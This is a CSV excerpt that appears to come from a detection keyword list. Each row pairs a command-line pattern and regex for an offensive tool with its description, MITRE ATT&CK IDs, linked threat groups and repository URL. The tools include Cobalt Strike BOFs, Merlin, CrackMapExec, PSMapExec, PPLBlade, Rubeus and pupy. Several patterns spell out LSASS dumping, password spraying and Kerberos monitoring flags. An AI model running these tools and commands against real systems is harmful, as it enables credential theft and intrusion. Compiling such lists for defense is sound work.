"* MemReader_BoF*",".{0,1000}\sMemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","2138"
"* merlin.dll*",".{0,1000}\smerlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","2139"
"* merlin.py *",".{0,1000}\smerlin\.py\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","0","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","2140"
"* met_inject*",".{0,1000}\smet_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2142"
"* MetasploitCoop*",".{0,1000}\sMetasploitCoop.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","2143"
"* metasploit-info.nse*",".{0,1000}\smetasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2144"
"* metasploit-msgrpc-brute.nse*",".{0,1000}\smetasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2145"
"* metasploit-omnibus-builder *",".{0,1000}\smetasploit\-omnibus\-builder\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2146"
"* metasploit-xmlrpc-brute.nse*",".{0,1000}\smetasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2147"
"* -method * -nthash *",".{0,1000}\s\-method\s.{0,1000}\s\-nthash\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","2148"
"* -Method GenRelayList*",".{0,1000}\s\-Method\sGenRelayList.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2149"
"* -Method PSRemoting -Command *",".{0,1000}\s\-Method\sPSRemoting\s\-Command\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","2150"
"* -Method SessionHunter*",".{0,1000}\s\-Method\sSessionHunter.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2151"
"* -Method Spray -AccountAsPassword*",".{0,1000}\s\-Method\sSpray\s\-AccountAsPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2152"
"* -Method Spray -EmptyPassword*",".{0,1000}\s\-Method\sSpray\s\-EmptyPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2153"
"* -Method Spray -Hash *",".{0,1000}\s\-Method\sSpray\s\-Hash\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2154"
"* -Method Spray -Password *",".{0,1000}\s\-Method\sSpray\s\-Password\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2155"
"* Microsploit.sh*",".{0,1000}\sMicrosploit\.sh.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","2156"
"* mikrotik-routeros-brute.nse*",".{0,1000}\smikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2157"
"* mimidropper.hta*",".{0,1000}\smimidropper\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","2158"
"* mimikittenz*",".{0,1000}\smimikittenz.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2159"
"* mimipenguin.sh*",".{0,1000}\smimipenguin\.sh.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","2160"
"* mimipy.py *",".{0,1000}\smimipy\.py\s.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","2161"
"* mimipy.py *",".{0,1000}\smimipy\.py\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2162"
"* minidump-rs.exe*",".{0,1000}\sminidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2163"
"* MirrorDump.exe*",".{0,1000}\sMirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","2164"
"* mkzoneslices.sh*",".{0,1000}\smkzoneslices\.sh.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","2165"
"* mmouse-brute.nse*",".{0,1000}\smmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2166"
"* mmouse-exec.nse*",".{0,1000}\smmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2167"
"* mobaxterm.py*",".{0,1000}\smobaxterm\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2168"
"* --mobaxterm-poison-hkcr*",".{0,1000}\s\-\-mobaxterm\-poison\-hkcr.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","2169"
"* modbus-discover.nse*",".{0,1000}\smodbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2170"
"* --mode decrypt --dumpname *.dmp --key *",".{0,1000}\s\-\-mode\sdecrypt\s\-\-dumpname\s.{0,1000}\.dmp\s\-\-key\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","2171"
"* --mode dump --name *.exe --handle procexp --obfuscate*",".{0,1000}\s\-\-mode\sdump\s\-\-name\s.{0,1000}\.exe\s\-\-handle\sprocexp\s\-\-obfuscate.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","2172"
"* --mode dump --name lsass.exe*",".{0,1000}\s\-\-mode\sdump\s\-\-name\slsass\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","2173"
"* --mode proxy --ghidra *--dll *",".{0,1000}\s\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","2174"
"* -Module Bloodhound -Method All*",".{0,1000}\s\-Module\sBloodhound\s\-Method\sAll.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","2175"
"* -Module Bloodhound -Scope All*",".{0,1000}\s\-Module\sBloodhound\s\-Scope\sAll.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","2176"
"* -Module kerbdump*",".{0,1000}\s\-Module\skerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2177"
"* --module o365_spray_activesync*",".{0,1000}\s\-\-module\so365_spray_activesync.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2178"
"* mongodb-brute.nse*",".{0,1000}\smongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2179"
"* mongodb-databases.nse*",".{0,1000}\smongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2180"
"* mongodb-info.nse*",".{0,1000}\smongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2181"
"* monitor /interval:* /filteruser:*",".{0,1000}\smonitor\s\/interval\:.{0,1000}\s\/filteruser\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2182"
"* moodlescan -r -u *",".{0,1000}\smoodlescan\s\-r\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2183"
"* -Mouselogger Start*",".{0,1000}\s\-Mouselogger\sStart.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2184"
"* mouselogger.py*",".{0,1000}\smouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2185"
"* mqtt-subscribe.nse*",".{0,1000}\smqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2186"
